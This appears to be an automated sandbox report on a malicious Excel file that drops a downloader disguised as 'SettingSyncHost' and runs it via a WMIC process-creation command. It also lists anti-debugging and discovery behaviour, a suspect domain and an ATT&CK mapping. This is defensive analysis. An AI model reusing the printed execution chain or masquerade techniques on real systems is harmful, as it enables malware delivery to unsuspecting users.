Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA7C9A	4_2_00FA7C9A
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FCE5D0	4_2_00FCE5D0
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FDED5B	4_2_00FDED5B
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA9526	4_2_00FA9526
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA9E34	4_2_00FA9E34
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F95E1E	4_2_00F95E1E
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA57E8	4_2_00FA57E8
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FA8FD5	4_2_00FA8FD5
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FB17A0	4_2_00FB17A0
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FF170D	4_2_00FF170D

Source: C:\Users\Public\SettingSyncHost

Code function: String function: 00F9A560 appears 31 times

Source: classification engine

Classification label: mal100.expl.evad.winXLSX@5/12@2/2

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{F3604315-A9D5-4512-AFDE-51636B3316A2} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\SettingSyncHost	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\SettingSyncHost	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create 'C:/Users/Public/SettingSyncHost'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\SettingSyncHost C:/Users/Public/SettingSyncHost
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create 'C:/Users/Public/SettingSyncHost'	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 3F97s4aQjB.xlsx

Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb source: SettingSyncHost
Source:	Binary string: C:\Work\Downloader\Downloader\Release\Downloader.pdb5 source: SettingSyncHost, 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00F91070 LoadLibraryA,GetProcAddress,GetProcAddress,

4_2_00F91070

Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FF5CA5 push ecx; ret		4_2_00FF5CB8
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F9A5A5 push ecx; ret		4_2_00F9A5B8

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\SettingSyncHost			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\SettingSyncHost

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\SettingSyncHost			Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\Public\SettingSyncHost

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\Public\SettingSyncHost

Code function: GetAdaptersInfo,GetAdaptersInfo,

4_2_00FCBB10

Source: C:\Users\Public\SettingSyncHost

Evasive API call chain: GetLocalTime,DecisionNodes

graph_4-21809

Source: C:\Users\Public\SettingSyncHost

API coverage: 7.1 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00FCCEB0 FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose,

4_2_00FCCEB0

Source: WMIC.exe, 00000002.00000002.225347660.0000000000A10000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WMIC.exe, 00000002.00000002.225347660.0000000000A10000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000002.00000002.225347660.0000000000A10000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WMIC.exe, 00000002.00000002.225347660.0000000000A10000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\Public\SettingSyncHost

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00F950DA MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_2_00F950DA

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00F91070 LoadLibraryA,GetProcAddress,GetProcAddress,

4_2_00F91070

Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FE105A mov eax, dword ptr fs:[00000030h]	4_2_00FE105A
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FEA4CE mov eax, dword ptr fs:[00000030h]	4_2_00FEA4CE
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F91FE0 mov eax, dword ptr fs:[00000030h]	4_2_00F91FE0

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00FA045E VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

4_2_00FA045E

Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F99082 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00F99082
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FDE083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00FDE083
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00FD94F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00FD94F2
Source: C:\Users\Public\SettingSyncHost	Code function: 4_2_00F93C21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00F93C21

Source: Yara match

File source: app.xml, type: SAMPLE

Source: SettingSyncHost, 00000004.00000002.1301626066.00000000017E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: SettingSyncHost, 00000004.00000002.1301626066.00000000017E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: SettingSyncHost, 00000004.00000002.1301626066.00000000017E0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: SettingSyncHost, 00000004.00000002.1301626066.00000000017E0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\Public\SettingSyncHost	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_00F9B0F2
Source: C:\Users\Public\SettingSyncHost	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00F988B2
Source: C:\Users\Public\SettingSyncHost	Code function: EnumSystemLocalesW,	4_2_00FEE095
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoW,	4_2_00FE901B
Source: C:\Users\Public\SettingSyncHost	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_00F9B006
Source: C:\Users\Public\SettingSyncHost	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_00F9B195
Source: C:\Users\Public\SettingSyncHost	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_00F9B159
Source: C:\Users\Public\SettingSyncHost	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_00F97908
Source: C:\Users\Public\SettingSyncHost	Code function: EnumSystemLocalesW,	4_2_00FE8AF9
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoA,	4_2_00F9AADA
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	4_2_00FAC281
Source: C:\Users\Public\SettingSyncHost	Code function: __crtGetLocaleInfoA_stat,	4_2_00FAC35B
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00FEE499
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00F9AC3E
Source: C:\Users\Public\SettingSyncHost	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	4_2_00F98C12
Source: C:\Users\Public\SettingSyncHost	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	4_2_00FA1C0F
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_00F9ADDA
Source: C:\Users\Public\SettingSyncHost	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00F98594
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoA,___ascii_strnicmp,__tolower_l,__tolower_l,	4_2_00FA2D8A
Source: C:\Users\Public\SettingSyncHost	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_00F9AD33
Source: C:\Users\Public\SettingSyncHost	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_00FEDD0D
Source: C:\Users\Public\SettingSyncHost	Code function: GetLocaleInfoA,	4_2_00FA2EBF
Source: C:\Users\Public\SettingSyncHost	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00FEE66E
Source: C:\Users\Public\SettingSyncHost	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_00F9AE35
Source: C:\Users\Public\SettingSyncHost	Code function: EnumSystemLocalesW,	4_2_00FEDFFA
Source: C:\Users\Public\SettingSyncHost	Code function: EnumSystemLocalesW,	4_2_00FEDFAF

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00F930E0 GetLocalTime,@_RTC_CheckStackVars@8,

4_2_00F930E0

Source: C:\Users\Public\SettingSyncHost

Code function: 4_2_00FCBF90 SHGetFolderPathA,GetUserNameA,GetComputerNameExA,

4_2_00FCBF90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	Path Interception	Process Injection2	Masquerading121	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting1	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API2	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution33	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting1	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Extra Window Memory Injection1	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery14	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3F97s4aQjB.xlsx	7%	Virustotal		Browse
3F97s4aQjB.xlsx	2%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png	100%	Joe Sandbox ML
C:\Users\Public\SettingSyncHost	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
injuryless.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
